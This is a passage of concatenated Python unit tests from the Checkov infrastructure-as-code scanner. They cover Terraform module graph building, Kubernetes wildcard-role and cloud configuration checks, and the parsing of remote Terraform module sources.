                f'{resources_dir}/prod/sub-prod/main.tf{TERRAFORM_NESTED_MODULE_PATH_PREFIX}{resources_dir}/prod/main.tf{TERRAFORM_NESTED_MODULE_INDEX_SEPARATOR}0{TERRAFORM_NESTED_MODULE_PATH_ENDING}',
                f'{resources_dir_no_stacks}/s3_inner_modules/main.tf{TERRAFORM_NESTED_MODULE_PATH_PREFIX}{resources_dir}/prod/sub-prod/main.tf{TERRAFORM_NESTED_MODULE_INDEX_SEPARATOR}0{TERRAFORM_NESTED_MODULE_PATH_PREFIX}{resources_dir}/prod/main.tf{TERRAFORM_NESTED_MODULE_INDEX_SEPARATOR}0{TERRAFORM_NESTED_MODULE_PATH_ENDING}{TERRAFORM_NESTED_MODULE_PATH_ENDING}',
            ],
            [
                f'{resources_dir}/stage/main.tf',
                f'{resources_dir_no_stacks}/s3_inner_modules/main.tf{TERRAFORM_NESTED_MODULE_PATH_PREFIX}{resources_dir}/stage/main.tf{TERRAFORM_NESTED_MODULE_INDEX_SEPARATOR}0{TERRAFORM_NESTED_MODULE_PATH_ENDING}',
            ],
            [
                f'{resources_dir}/test/main.tf',
                f'{resources_dir_no_stacks}/s3_inner_modules/main.tf{TERRAFORM_NESTED_MODULE_PATH_PREFIX}{resources_dir}/test/main.tf{TERRAFORM_NESTED_MODULE_INDEX_SEPARATOR}0{TERRAFORM_NESTED_MODULE_PATH_ENDING}',
            ],
        ]
        self.assertEqual(module.module_dependency_map[f'{os.path.dirname(resources_dir)}/s3_inner_modules/inner'], expected_inner_modules)

    def test_blocks_from_local_graph_module(self):
        resources_dir = os.path.realpath(os.path.join(TEST_DIRNAME, '../resources/modules/stacks'))
        hcl_config_parser = Parser()
        module, _ = hcl_config_parser.parse_hcl_module(resources_dir, self.source)
        self.assertEqual(len(list(filter(lambda block: block.block_type == BlockType.RESOURCE and block.name == 'aws_s3_bucket.inner_s3', module.blocks))), 3)
        self.assertEqual(len(list(filter(lambda block: block.block_type == BlockType.MODULE and block.name == 'inner_module_call', module.blocks))), 3)
        self.assertEqual(len(list(filter(lambda block: block.block_type == BlockType.MODULE and block.name == 's3', module.blocks))), 3)
        self.assertEqual(len(list(filter(lambda block: block.block_type == BlockType.MODULE and block.name == 'sub-module', module.blocks))), 1)

    @mock.patch.dict(os.environ, {"CHECKOV_ENABLE_NESTED_MODULES": "False"})
    def test_vertices_from_local_graph_module(self):
        parent_dir = Path(TEST_DIRNAME).parent
        resources_dir = str(parent_dir / "resources/modules/stacks")
        hcl_config_parser = Parser()
        module, _ = hcl_config_parser.parse_hcl_module(resources_dir, self.source)
        local_graph = TerraformLocalGraph(module)
        local_graph.build_graph(render_variables=True)

        self.assertEqual(12, len(local_graph.edges))

        # check vertex breadcrumbs
        bucket_vertex_1 = next(
            vertex
            for vertex in local_graph.vertices
            if vertex.name == "aws_s3_bucket.inner_s3" and vertex.source_module == {4}
        )
        bucket_vertex_2 = next(
            vertex
            for vertex in local_graph.vertices
            if vertex.name == "aws_s3_bucket.inner_s3" and vertex.source_module == {5}
        )
        bucket_vertex_3 = next(
            vertex
            for vertex in local_graph.vertices
            if vertex.name == "aws_s3_bucket.inner_s3" and vertex.source_module == {6}
        )
        self.assertDictEqual(
            {
                "versioning.enabled": [
                    {
                        "type": "module",
                        "name": "inner_module_call",
                        "path": str(parent_dir / "resources/modules/s3_inner_modules/main.tf"),
                        "module_connection": False,
                    },
                    {
                        "type": "variable",
                        "name": "versioning",
                        "path": str(parent_dir / "resources/modules/s3_inner_modules/inner/variables.tf"),
                        "module_connection": False,
                    },
                ],
                "source_module_": [
                    {
                        "type": "module",
                        "name": "sub-module",
                        "path": str(parent_dir / "resources/modules/stacks/prod/main.tf"),
                        "idx": 0
                    },
                    {
                        "type": "module",
                        "name": "s3",
                        "path": str(parent_dir / "resources/modules/stacks/prod/sub-prod/main.tf"),
                        "idx": 3
                    },
                    {
                        "type": "module",
                        "name": "inner_module_call",
                        "path": str(parent_dir / "resources/modules/s3_inner_modules/main.tf"),
                        "idx": 4
                    },
                ],
            },
            bucket_vertex_1.breadcrumbs,
        )

        self.assertDictEqual(
            {
                "versioning.enabled": [
                    {
                        "type": "module",
                        "name": "inner_module_call",
                        "path": str(parent_dir / "resources/modules/s3_inner_modules/main.tf"),
                        "module_connection": False,
                    },
                    {
                        "type": "variable",
                        "name": "versioning",
                        "path": str(parent_dir / "resources/modules/s3_inner_modules/inner/variables.tf"),
                        "module_connection": False,
                    },
                ],
                "source_module_": [
                    {
                        "type": "module",
                        "name": "s3",
                        "path": str(parent_dir / "resources/modules/stacks/stage/main.tf"),
                        "idx": 1
                    },
                    {
                        "type": "module",
                        "name": "inner_module_call",
                        "path": str(parent_dir / "resources/modules/s3_inner_modules/main.tf"),
                        "idx": 5
                    },
                ],
            },
            bucket_vertex_2.breadcrumbs,
        )

        self.assertDictEqual(
            {
                "versioning.enabled": [
                    {
                        "type": "module",
                        "name": "inner_module_call",
                        "path": str(parent_dir / "resources/modules/s3_inner_modules/main.tf"),
                        "module_connection": False,
                    },
                    {
                        "type": "variable",
                        "name": "versioning",
                        "path": str(parent_dir / "resources/modules/s3_inner_modules/inner/variables.tf"),
                        "module_connection": False,
                    },
                ],
                "source_module_": [
                    {
                        "type": "module",
                        "name": "s3",
                        "path": str(parent_dir / "resources/modules/stacks/test/main.tf"),
                        "idx": 2
                    },
                    {
                        "type": "module",
                        "name": "inner_module_call",
                        "path": str(parent_dir / "resources/modules/s3_inner_modules/main.tf"),
                        "idx": 6
                    },
                ],
            },
            bucket_vertex_3.breadcrumbs,
        )

    @mock.patch.dict(os.environ, {"CHECKOV_ENABLE_NESTED_MODULES": "True"})
    def test_vertices_from_local_graph_module_nested_module_enable(self):
        parent_dir = Path(TEST_DIRNAME).parent
        resources_dir = str(parent_dir / "resources/modules/stacks")
        hcl_config_parser = Parser()
        module, _ = hcl_config_parser.parse_hcl_module(resources_dir, self.source)
        local_graph = TerraformLocalGraph(module)
        local_graph.build_graph(render_variables=True)

        self.assertEqual(12, len(local_graph.edges))

        # check vertex breadcrumbs
        bucket_vertex_1 = next(
            vertex
            for vertex in local_graph.vertices
            if vertex.name == "aws_s3_bucket.inner_s3" and vertex.source_module == {6}
        )
        bucket_vertex_2 = next(
            vertex
            for vertex in local_graph.vertices
            if vertex.name == "aws_s3_bucket.inner_s3" and vertex.source_module == {7}
        )
        bucket_vertex_3 = next(
            vertex
            for vertex in local_graph.vertices
            if vertex.name == "aws_s3_bucket.inner_s3" and vertex.source_module == {8}
        )
        self.assertDictEqual(
            {
                "versioning.enabled": [
                    {
                        "type": "module",
                        "name": "inner_module_call",
                        "path": str(parent_dir / "resources/modules/s3_inner_modules/main.tf"),
                        "module_connection": False,
                    },
                    {
                        "type": "variable",
                        "name": "versioning",
                        "path": str(parent_dir / "resources/modules/s3_inner_modules/inner/variables.tf"),
                        "module_connection": False,
                    },
                ],
                "source_module_": [
                    {
                        "type": "module",
                        "name": "sub-module",
                        "path": str(parent_dir / "resources/modules/stacks/prod/main.tf"),
                        "idx": 12
                    },
                    {
                        "type": "module",
                        "name": "s3",
                        "path": str(parent_dir / "resources/modules/stacks/prod/sub-prod/main.tf"),
                        "idx": 13
                    },
                    {
                        "type": "module",
                        "name": "inner_module_call",
                        "path": str(parent_dir / "resources/modules/s3_inner_modules/main.tf"),
                        "idx": 6
                    },
                ],
            },
            bucket_vertex_1.breadcrumbs,
        )

        self.assertDictEqual(
            {
                "versioning.enabled": [
                    {
                        "type": "module",
                        "name": "inner_module_call",
                        "path": str(parent_dir / "resources/modules/s3_inner_modules/main.tf"),
                        "module_connection": False,
                    },
                    {
                        "type": "variable",
                        "name": "versioning",
                        "path": str(parent_dir / "resources/modules/s3_inner_modules/inner/variables.tf"),
                        "module_connection": False,
                    },
                ],
                "source_module_": [
                    {
                        "type": "module",
                        "name": "s3",
                        "path": str(parent_dir / "resources/modules/stacks/stage/main.tf"),
                        "idx": 14
                    },
                    {
                        "type": "module",
                        "name": "inner_module_call",
                        "path": str(parent_dir / "resources/modules/s3_inner_modules/main.tf"),
                        "idx": 7
                    },
                ],
            },
            bucket_vertex_2.breadcrumbs,
        )

        self.assertDictEqual(
            {
                "versioning.enabled": [
                    {
                        "type": "module",
                        "name": "inner_module_call",
                        "path": str(parent_dir / "resources/modules/s3_inner_modules/main.tf"),
                        "module_connection": False,
                    },
                    {
                        "type": "variable",
                        "name": "versioning",
                        "path": str(parent_dir / "resources/modules/s3_inner_modules/inner/variables.tf"),
                        "module_connection": False,
                    },
                ],
                "source_module_": [
                    {
                        "type": "module",
                        "name": "s3",
                        "path": str(parent_dir / "resources/modules/stacks/test/main.tf"),
                        "idx": 15
                    },
                    {
                        "type": "module",
                        "name": "inner_module_call",
                        "path": str(parent_dir / "resources/modules/s3_inner_modules/main.tf"),
                        "idx": 8
                    },
                ],
            },
            bucket_vertex_3.breadcrumbs,
        )

    def test_variables_same_name_different_modules(self):
        resources_dir = os.path.realpath(os.path.join(TEST_DIRNAME, '../resources/modules/same_var_names'))
        hcl_config_parser = Parser()
        module, _ = hcl_config_parser.parse_hcl_module(resources_dir, self.source)
        local_graph = TerraformLocalGraph(module)
        local_graph.build_graph(render_variables=True)
        print(local_graph.edges)
        self.assertEqual(12, len(local_graph.edges))
        self.assertEqual(13, len(local_graph.vertices))

        module_variable_edges = [
            e for e in local_graph.edges
            if local_graph.vertices[e.dest].block_type == "module" and local_graph.vertices[e.dest].path.endswith(
                'same_var_names/module2/main.tf')
        ]

        # Check they point to 2 different modules
        self.assertEqual(2, len(module_variable_edges))
        self.assertNotEqual(local_graph.vertices[module_variable_edges[0].origin],
                            local_graph.vertices[module_variable_edges[1].origin])


        module_variable_edges = [
            e for e in local_graph.edges
            if local_graph.vertices[e.dest].block_type == "module" and local_graph.vertices[e.dest].path.endswith('same_var_names/module1/main.tf')
        ]

        # Check they point to 2 different modules
        self.assertEqual(2, len(module_variable_edges))
        self.assertNotEqual(local_graph.vertices[module_variable_edges[0].origin], local_graph.vertices[module_variable_edges[1].origin])

    @mock.patch.dict(os.environ, {"CHECKOV_ENABLE_NESTED_MODULES": "True"})
    def test_nested_modules_instances(self):
        resources_dir = os.path.realpath(os.path.join(TEST_DIRNAME, '../resources/modules/nested_modules_instances'))
        hcl_config_parser = Parser()
        module, _ = hcl_config_parser.parse_hcl_module(resources_dir, self.source)
        local_graph = TerraformLocalGraph(module)
        local_graph.build_graph(render_variables=True)

        vertices = [vertex.to_dict() for vertex in local_graph.vertices]
        edges = [edge.to_dict() for edge in local_graph.edges]

        with open(os.path.realpath(os.path.join(TEST_DIRNAME, '../resources/modules/nested_modules_instances/expected_local_graph.json')), 'r') as f:
            expected = json.load(f)

        self.assertCountEqual(
            json.loads(json.dumps(vertices).replace(resources_dir, '')),
            json.loads(json.dumps(expected.get('vertices')).replace(resources_dir, '')),

        )
        self.assertCountEqual(edges, expected.get('edges'))



import os
import unittest

from checkov.kubernetes.checks.resource.k8s.WildcardRoles import check
from checkov.kubernetes.runner import Runner
from checkov.runner_filter import RunnerFilter


class TestWildcardRoles(unittest.TestCase):

    def test_summary(self):
        runner = Runner()
        current_dir = os.path.dirname(os.path.realpath(__file__))

        test_files_dir = current_dir + "/example_WildcardRoles"
        report = runner.run(root_folder=test_files_dir,runner_filter=RunnerFilter(checks=[check.id]))
        summary = report.get_summary()

        passing_resources = {
            'Role.test.test-should-pass-3',
            'Role.test.test-should-pass-2'
        }
        failing_resources = {
            'Role.test.test-should-fail-1',
            'Role.test.test-should-fail-2',
            'ClusterRole.test.test-should-fail-3'
        }

        self.assertEqual(summary['passed'], 2)
        self.assertEqual(summary['failed'], 3)
        self.assertEqual(summary['skipped'], 0)
        self.assertEqual(summary['parsing_errors'], 0)

        passed_check_resources = set([c.resource for c in report.passed_checks])
        failed_check_resources = set([c.resource for c in report.failed_checks])

        self.assertEqual(passing_resources, passed_check_resources)
        self.assertEqual(failing_resources, failed_check_resources)


if __name__ == '__main__':
    unittest.main()



import unittest

import hcl2

from checkov.terraform.checks.resource.gcp.GoogleComputeBootDiskEncryption import check
from checkov.common.models.enums import CheckResult


class TestGoogleComputeBootDiskEncryption(unittest.TestCase):

    def test_failure(self):
        hcl_res = hcl2.loads("""
            resource "google_compute_instance" "default" {
              name         = "test"
              machine_type = "n1-standard-1"
              zone         = "us-central1-a"
              boot_disk {}
            }
                """)
        resource_conf = hcl_res['resource'][0]['google_compute_instance']['default']
        scan_result = check.scan_resource_conf(conf=resource_conf)
        self.assertEqual(CheckResult.FAILED, scan_result)

    def test_success(self):
        hcl_res = hcl2.loads("""
            resource "google_compute_instance" "default" {
              name         = "test"
              machine_type = "n1-standard-1"
              zone         = "us-central1-a"
              boot_disk {
                disk_encryption_key_raw = "acXTX3rxrKAFTF0tYVLvydU1riRZTvUNC4g5I11NY-c="
                }
            }
                """)
        resource_conf = hcl_res['resource'][0]['google_compute_instance']['default']
        scan_result = check.scan_resource_conf(conf=resource_conf)
        self.assertEqual(CheckResult.PASSED, scan_result)


if __name__ == '__main__':
    unittest.main()



import responses

from checkov.terraform.module_loading.loaders.registry_loader import RegistryLoader
from checkov.terraform.module_loading.module_params import ModuleParams


@responses.activate
def test_module_version_url_invoked_once():
    # given
    module_version_url = "https://registry.terraform.io/v1/modules/terraform-aws-modules/example/versions"
    responses.add(
        method=responses.GET,
        url=module_version_url,
        json={"modules": [{"versions": [{"version": "1.0.0"}]}]},
        status=200,
    )
    loader = RegistryLoader()
    RegistryLoader.modules_versions_cache = {}  # reset cache
    module_params = ModuleParams("", "", "terraform-aws-modules/example", "", "", "")

    # when
    loader._is_matching_loader(module_params)
    loader._is_matching_loader(module_params)

    # then
    responses.assert_call_count(module_version_url, 1)
    assert loader.modules_versions_cache == {module_version_url: ["1.0.0"]}



import unittest
import hcl2

from checkov.terraform.checks.resource.aws.S3ProtectAgainstPolicyLockout import check
from checkov.common.models.enums import CheckResult


class TestS3ProtectAgainstPolicyLockout(unittest.TestCase):

    def test_failure(self):
        hcl_res = hcl2.loads("""
        resource "aws_s3_bucket" "s3" {
        bucket = "bucket"

        policy = <<POLICY
        {
        "Version": "2012-10-17",
        "Statement": [
            {
            "Principal": {
                "AWS": [
                "*"
                ]
            },
            "Effect": "Deny",
            "Action": [
                "s3:*"
            ],
            "Resource": [
                "*"
            ]
            }
        ]
        }
        POLICY
        }
        """)
        resource_conf = hcl_res['resource'][0]['aws_s3_bucket']['s3']
        scan_result = check.scan_resource_conf(conf=resource_conf)
        self.assertEqual(CheckResult.FAILED, scan_result)

    def test_failure_2(self):
        hcl_res = hcl2.loads("""
        resource "aws_s3_bucket_policy" "s3" {
        bucket = "bucket"

        policy = <<POLICY
        {
            "Version": "2012-10-17",
            "Statement": [{
                "Principal": {
                    "AWS": [
                        "*"
                    ]
                },
                "Effect": "Deny",
                "Action": "s3:*",
                "Resource": [
                    "*"
                ]
            }]
        }
        POLICY
        }
                """)
        resource_conf = hcl_res['resource'][0]['aws_s3_bucket_policy']['s3']
        scan_result = check.scan_resource_conf(conf=resource_conf)
        self.assertEqual(CheckResult.FAILED, scan_result)

    def test_failure_3(self):
        hcl_res = hcl2.loads("""
        resource "aws_s3_bucket" "s3" {
        bucket = "bucket"

        policy = <<POLICY
        {
        "Version": "2012-10-17",
        "Statement": [
            {
            "Principal": "*",
            "Effect": "Deny",
            "Action": "s3:*"
            }
        ]
        }
        POLICY
        }
                """)
        resource_conf = hcl_res['resource'][0]['aws_s3_bucket']['s3']
        scan_result = check.scan_resource_conf(conf=resource_conf)
        self.assertEqual(CheckResult.FAILED, scan_result)

    def test_skip_noeffect(self):
        hcl_res = hcl2.loads("""
        resource "aws_s3_bucket_policy" "s3" {
        bucket = "bucket"

        policy = <<POLICY
        {
            "Id": "Policy1597273448050",
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Sid": "Stmt1597273446725",
                    "Action": [
                        "s3:GetObject"
                    ],
                    "Resource": "arn:aws:s3:::bucket/*",
                    "Principal": {
                        "AWS": "some_arn"
                    }
                }
            ]
        }
        POLICY
        }
        """)
        resource_conf = hcl_res['resource'][0]['aws_s3_bucket_policy']['s3']
        scan_result = check.scan_resource_conf(conf=resource_conf)
        self.assertEqual(CheckResult.PASSED, scan_result)

    def test_skip_notaction(self):
        hcl_res = hcl2.loads("""
        resource "aws_s3_bucket_policy" "s3" {
        bucket = "bucket"

        policy = <<POLICY
        {
            "Id": "Policy1597273448050",
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Sid": "Stmt1597273446725",
                    "NotAction": [
                        "s3:GetObject"
                    ],
                    "Effect": "Deny",
                    "Resource": "arn:aws:s3:::bucket/*",
                    "Principal": {
                        "AWS": "some_arn"
                    }
                }
            ]
        }
        POLICY
        }
        """)
        resource_conf = hcl_res['resource'][0]['aws_s3_bucket_policy']['s3']
        scan_result = check.scan_resource_conf(conf=resource_conf)
        self.assertEqual(CheckResult.PASSED, scan_result)

    def test_success_policyobj(self):
        hcl_res = hcl2.loads("""
        resource "aws_s3_bucket_policy" "s3" {
        bucket = "bucket"

        policy = <<POLICY
        {
            "Id": "Policy1597273448050",
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Sid": "Stmt1597273446725",
                    "Action": [
                        "s3:GetObject"
                    ],
                    "Effect": "Deny",
                    "Resource": "arn:aws:s3:::bucket/*",
                    "Principal": {
                        "AWS": "some_arn"
                    }
                }
            ]
        }
        POLICY
        }
        """)
        resource_conf = hcl_res['resource'][0]['aws_s3_bucket_policy']['s3']
        scan_result = check.scan_resource_conf(conf=resource_conf)
        self.assertEqual(CheckResult.PASSED, scan_result)

    def test_success_statementnotlist(self):
        hcl_res = hcl2.loads("""
        resource "aws_s3_bucket_policy" "s3" {
        bucket = "bucket"

        policy = <<POLICY
        {
            "Id": "Policy1597273448050",
            "Version": "2012-10-17",
            "Statement": {
                    "Sid": "Stmt1597273446725",
                    "Action": [
                        "s3:GetObject"
                    ],
                    "Effect": "Deny",
                    "Resource": "arn:aws:s3:::bucket/*",
                    "Principal": {
                        "AWS": "some_arn"
                    }
                }
        }
        POLICY
        }
        """)
        resource_conf = hcl_res['resource'][0]['aws_s3_bucket_policy']['s3']
        scan_result = check.scan_resource_conf(conf=resource_conf)
        self.assertEqual(CheckResult.PASSED, scan_result)

if __name__ == '__main__':
    unittest.main()



from pathlib import Path

from checkov.common.output.report import CheckType

from checkov.common.bridgecrew.bc_source import get_source_type
from checkov.azure_pipelines.runner import Runner

from checkov.runner_filter import RunnerFilter
from pytest_mock import MockerFixture

from tests.common.image_referencer.test_utils import mock_get_license_statuses_async, mock_get_image_cached_result_async

RESOURCES_PATH = Path(__file__).parent / "resources/single_image"


def test_azure_pipelines_workflow(mocker: MockerFixture):
    from checkov.common.bridgecrew.platform_integration import bc_integration
    file_name = "azure-pipelines.yaml"
    image_name = "redis:latest"
    test_file = RESOURCES_PATH / file_name

    runner_filter = RunnerFilter(run_image_referencer=True)
    bc_integration.bc_source = get_source_type("disabled")

    mocker.patch(
        "checkov.common.images.image_referencer.image_scanner.get_scan_results_from_cache_async",
        side_effect=mock_get_image_cached_result_async,
    )
    mocker.patch(
        "checkov.common.images.image_referencer.get_license_statuses_async",
        side_effect=mock_get_license_statuses_async,
    )

    reports = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter)

    assert len(reports) == 2

    azure_pipelines_report = next(report for report in reports if report.check_type == CheckType.AZURE_PIPELINES)
    sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE)

    assert len(azure_pipelines_report.resources) == 0
    assert len(azure_pipelines_report.passed_checks) == 1
    assert len(azure_pipelines_report.failed_checks) == 2
    assert len(azure_pipelines_report.skipped_checks) == 0
    assert len(azure_pipelines_report.parsing_errors) == 0


    assert sca_image_report.image_cached_results[0]["dockerImageName"] == image_name
    assert sca_image_report.image_cached_results[0]["packages"] == [
        {"type": "os", "name": "tzdata", "version": "2021a-1+deb11u5", "licenses": []}
    ]

    assert len(sca_image_report.passed_checks) == 1
    assert len(sca_image_report.failed_checks) == 4
    assert len(sca_image_report.image_cached_results) == 1
    assert len(sca_image_report.skipped_checks) == 0
    assert len(sca_image_report.parsing_errors) == 0



import os
from contextlib import ExitStack as does_not_raise
from pathlib import Path
from unittest import mock

import pytest

from checkov.common.util.consts import DEFAULT_EXTERNAL_MODULES_DIR
from checkov.terraform.module_loading.loaders.bitbucket_loader import BitbucketLoader # noqa
from checkov.terraform.module_loading.loaders.git_loader import GenericGitLoader # noqa
from checkov.terraform.module_loading.loaders.github_loader import GithubLoader # noqa
from checkov.terraform.module_loading.registry import ModuleLoaderRegistry # noqa
from checkov.terraform.module_loading.loaders.github_access_token_loader import GithubAccessTokenLoader # noqa
from checkov.terraform.module_loading.loaders.bitbucket_access_token_loader import BitbucketAccessTokenLoader # noqa


@pytest.mark.parametrize(
    "source, source_version, expected_content_path, expected_git_url, expected_dest_dir, expected_module_source, expected_inner_module",
    [
        (
            "terraform-aws-modules/security-group/aws",
            "4.0.0",
            "github.com/terraform-aws-modules/terraform-aws-security-group/v4.0.0",
            "https://github.com/terraform-aws-modules/terraform-aws-security-group?ref=v4.0.0",
            "github.com/terraform-aws-modules/terraform-aws-security-group/v4.0.0",
            "git::https://github.com/terraform-aws-modules/terraform-aws-security-group?ref=v4.0.0",
            "",
        ),
        (
            "terraform-aws-modules/security-group/aws//modules/http-80",
            "4.0.0",
            "github.com/terraform-aws-modules/terraform-aws-security-group/v4.0.0/modules/http-80",
            "https://github.com/terraform-aws-modules/terraform-aws-security-group?ref=v4.0.0",
            "github.com/terraform-aws-modules/terraform-aws-security-group/v4.0.0",
            "git::https://github.com/terraform-aws-modules/terraform-aws-security-group?ref=v4.0.0",
            "modules/http-80",
        )
    ],
    ids=["module_with_version", "inner_module_with_version"],
)
@mock.patch("checkov.terraform.module_loading.loaders.git_loader.GitGetter", autospec=True)
def test_load_terraform_registry(
    git_getter,
    tmp_path: Path,
    source,
    source_version,
    expected_content_path,
    expected_git_url,
    expected_dest_dir,
    expected_module_source,
    expected_inner_module,
):
    # given
    current_dir = tmp_path / "tf_registry"
    registry = ModuleLoaderRegistry(download_external_modules=True)
    registry.module_content_cache = {}

    # when
    content = registry.load(current_dir=str(current_dir), source=source, source_version=source_version)

    # then
    assert content.loaded()
    assert content.path() == str(Path(DEFAULT_EXTERNAL_MODULES_DIR) / expected_content_path)

    git_getter.assert_called_once_with(expected_git_url, mock.ANY)


@pytest.mark.parametrize(
    "source, expected_content_path, expected_git_url, expected_dest_dir, expected_module_source, expected_inner_module",
    [
        (
            "git::https://example.com/network.git",
            "example.com/network/HEAD",
            "https://example.com/network.git",
            "example.com/network/HEAD",
            "git::https://example.com/network.git",
            "",
        ),
        (
            "git::https://example.com/network.git?ref=v1.2.0",
            "example.com/network/v1.2.0",
            "https://example.com/network.git?ref=v1.2.0",
            "example.com/network/v1.2.0",
            "git::https://example.com/network.git?ref=v1.2.0",
            "",
        ),
        (
            "git::https://example.com/network.git//modules/vpc",
            "example.com/network/HEAD/modules/vpc",
            "https://example.com/network",
            "example.com/network/HEAD",
            "git::https://example.com/network",
            "modules/vpc",
        ),
        (
            "git::https://example.com/network.git//modules/vpc?ref=v1.2.0",
            "example.com/network/v1.2.0/modules/vpc",
            "https://example.com/network?ref=v1.2.0",
            "example.com/network/v1.2.0",
            "git::https://example.com/network?ref=v1.2.0",
            "modules/vpc",
        ),
        (
            "git::ssh://username@example.com/network.git",
            "example.com/network/HEAD",
            "ssh://username@example.com/network.git",
            "example.com/network/HEAD",
            "git::ssh://username@example.com/network.git",
            "",
        ),
        (
            "git::ssh://username@example.com/network.git?ref=v1.2.0",
            "example.com/network/v1.2.0",
            "ssh://username@example.com/network.git?ref=v1.2.0",
            "example.com/network/v1.2.0",
            "git::ssh://username@example.com/network.git?ref=v1.2.0",
            "",
        ),
        (
            "git::username@example.com/network.git",
            "example.com/network/HEAD",
            "username@example.com/network.git",
            "example.com/network/HEAD",
            "git::username@example.com/network.git",
            "",
        ),
        (
            "git::username@example.com/network.git?ref=v1.2.0",
            "example.com/network/v1.2.0",
            "username@example.com/network.git?ref=v1.2.0",
            "example.com/network/v1.2.0",
            "git::username@example.com/network.git?ref=v1.2.0",
            "",
        ),
        (
            "git::ssh://git@github.com/bridgecrewio/terragoat//modules/s3-encrypted",
            "git@github.com/bridgecrewio/terragoat/HEAD/modules/s3-encrypted",
            "ssh://git@github.com/bridgecrewio/terragoat",
            "git@github.com/bridgecrewio/terragoat/HEAD",
            "git::ssh://git@github.com/bridgecrewio/terragoat",
            "modules/s3-encrypted",
        ),
    ],
    ids=[
        "module",
        "module_with_version",
        "inner_module",
        "inner_module_with_version",
        "module_over_ssh",
        "module_over_ssh_with_version",
        "module_over_ssh_without_protocol",
        "module_over_ssh_without_protocol_with_version",
        "git_username",
    ],
)
@mock.patch("checkov.terraform.module_loading.loaders.git_loader.GitGetter", autospec=True)
def test_load_generic_git(
    git_getter,
    tmp_path: Path,
    source,
    expected_content_path,
    expected_git_url,
    expected_dest_dir,
    expected_module_source,
    expected_inner_module,
):
    # given
    current_dir = tmp_path / "generic"
    registry = ModuleLoaderRegistry(download_external_modules=True)
    registry.module_content_cache = {}

    # when
    content = registry.load(current_dir=str(current_dir), source=source, source_version="latest")

    # then
    assert content.loaded()
    assert content.path() == str(Path(DEFAULT_EXTERNAL_MODULES_DIR) / expected_content_path)

    git_getter.assert_called_once_with(expected_git_url, mock.ANY)


@pytest.mark.parametrize(
    "source, expected_content_path, expected_git_url, expected_dest_dir, expected_module_source, expected_inner_module",
    [
        (
            "github.com/terraform-aws-modules/terraform-aws-security-group",
            "github.com/terraform-aws-modules/terraform-aws-security-group/HEAD",
            "https://github.com/terraform-aws-modules/terraform-aws-security-group",
            "github.com/terraform-aws-modules/terraform-aws-security-group/HEAD",
            "git::https://github.com/terraform-aws-modules/terraform-aws-security-group",
            "",
        ),
        (
            "github.com/terraform-aws-modules/terraform-aws-security-group?ref=v4.0.0",
            "github.com/terraform-aws-modules/terraform-aws-security-group/v4.0.0",
            "https://github.com/terraform-aws-modules/terraform-aws-security-group?ref=v4.0.0",
            "github.com/terraform-aws-modules/terraform-aws-security-group/v4.0.0",
            "git::https://github.com/terraform-aws-modules/terraform-aws-security-group?ref=v4.0.0",
            "",
        ),
        (
            "github.com/terraform-aws-modules/terraform-aws-security-group//modules/http-80",
            "github.com/terraform-aws-modules/terraform-aws-security-group/HEAD/modules/http-80",
            "https://github.com/terraform-aws-modules/terraform-aws-security-group",
            "github.com/terraform-aws-modules/terraform-aws-security-group/HEAD",
            "git::https://github.com/terraform-aws-modules/terraform-aws-security-group",
            "modules/http-80",
        ),
        (
            "github.com/terraform-aws-modules/terraform-aws-security-group//modules/http-80?ref=v4.0.0",
            "github.com/terraform-aws-modules/terraform-aws-security-group/v4.0.0/modules/http-80",
            "https://github.com/terraform-aws-modules/terraform-aws-security-group?ref=v4.0.0",
            "github.com/terraform-aws-modules/terraform-aws-security-group/v4.0.0",
            "git::https://github.com/terraform-aws-modules/terraform-aws-security-group?ref=v4.0.0",
            "modules/http-80",
        ),
    ],
    ids=["module", "module_with_version", "inner_module", "inner_module_with_version"],
)
@mock.patch("checkov.terraform.module_loading.loaders.git_loader.GitGetter", autospec=True)
def test_load_github(
    git_getter,
    tmp_path: Path,
    source,
    expected_content_path,
    expected_git_url,
    expected_dest_dir,
    expected_module_source,
    expected_inner_module,
):
    # given
    current_dir = tmp_path / "github"
    registry = ModuleLoaderRegistry(download_external_modules=True)
    registry.module_content_cache = {}

    # when
    content = registry.load(current_dir=str(current_dir), source=source, source_version="latest")

    # then
    assert content.loaded()
    assert content.path() == str(Path(DEFAULT_EXTERNAL_MODULES_DIR) / expected_content_path)

    git_getter.assert_called_once_with(expected_git_url, mock.ANY)


# TODO: create a dummy repo in bitbucket for more consitent tests
@pytest.mark.parametrize(
    "source, expected_content_path, expected_git_url, expected_dest_dir, expected_module_source, expected_inner_module",
    [
        (
            "bitbucket.org/nuarch/terraform-aws-rancher-server-ha",
            "bitbucket.org/nuarch/terraform-aws-rancher-server-ha/HEAD",
            "https://bitbucket.org/nuarch/terraform-aws-rancher-server-ha",
            "bitbucket.org/nuarch/terraform-aws-rancher-server-ha/HEAD",
            "git::https://bitbucket.org/nuarch/terraform-aws-rancher-server-ha",
            "",
        ),
        (
            "bitbucket.org/nuarch/terraform-aws-rancher-server-ha?ref=v0.1.0",
            "bitbucket.org/nuarch/terraform-aws-rancher-server-ha/v0.1.0",
            "https://bitbucket.org/nuarch/terraform-aws-rancher-server-ha?ref=v0.1.0",
            "bitbucket.org/nuarch/terraform-aws-rancher-server-ha/v0.1.0",
            "git::https://bitbucket.org/nuarch/terraform-aws-rancher-server-ha?ref=v0.1.0",
            "",
        ),
        (
            "bitbucket.org/nuarch/terraform-aws-rancher-server-ha//rancher2-ha",
            "bitbucket.org/nuarch/terraform-aws-rancher-server-ha/HEAD/rancher2-ha",
            "https://bitbucket.org/nuarch/terraform-aws-rancher-server-ha",
            "bitbucket.org/nuarch/terraform-aws-rancher-server-ha/HEAD",
            "git::https://bitbucket.org/nuarch/terraform-aws-rancher-server-ha",
            "rancher2-ha",
        ),
        (
            "bitbucket.org/nuarch/terraform-aws-rancher-server-ha//rancher2-ha?ref=v0.1.0",
            "bitbucket.org/nuarch/terraform-aws-rancher-server-ha/v0.1.0/rancher2-ha",
            "https://bitbucket.org/nuarch/terraform-aws-rancher-server-ha?ref=v0.1.0",
            "bitbucket.org/nuarch/terraform-aws-rancher-server-ha/v0.1.0",
            "git::https://bitbucket.org/nuarch/terraform-aws-rancher-server-ha?ref=v0.1.0",
            "rancher2-ha",
        ),
    ],
